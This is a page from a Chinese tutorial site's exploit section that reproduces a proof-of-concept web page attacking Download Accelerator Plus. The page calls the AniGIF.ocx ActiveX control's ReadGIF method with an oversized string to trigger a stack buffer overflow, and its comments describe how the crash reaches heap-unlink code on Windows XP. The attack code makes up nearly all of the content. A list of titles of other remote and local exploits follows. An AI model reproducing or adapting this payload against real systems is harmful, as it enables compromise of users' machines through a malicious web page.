手机
当前位置:查字典教程网 >网络安全 >Exploit >Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
摘要://anigif.ocxbywww.jcomsoft.comcanbefounddistribuitedwithsomeapplicatio...

<html>

<body>

<object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' />

</object>

<script language=javascript>

// anigif.ocx by www.jcomsoft.com can be found distribuited with some applications,

// I found it in Download Accelerator Plus 6.8.

// DAP comes with an old version, but the last from jcomsoft is also vulnerable:

// there's a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods,

// the funny thing is that after the first exception that will be handled by IE,

// when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx

// with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap

// overflow scenario.

var buf;

for (var i=0; i<259; i ) buf = "X";

buf ="BBBB";

buf = "CCCC";

for (var i=0; i<5728; i ) buf = "H";

target.ReadGIF(buf);

window.location = "http://www.google.com";

</script>

</body>

</html>

【Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC】相关文章:

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

CodeDB (list.php lang) Local File Inclusion Vulnerability

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

Poppler

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

精品推荐
分类导航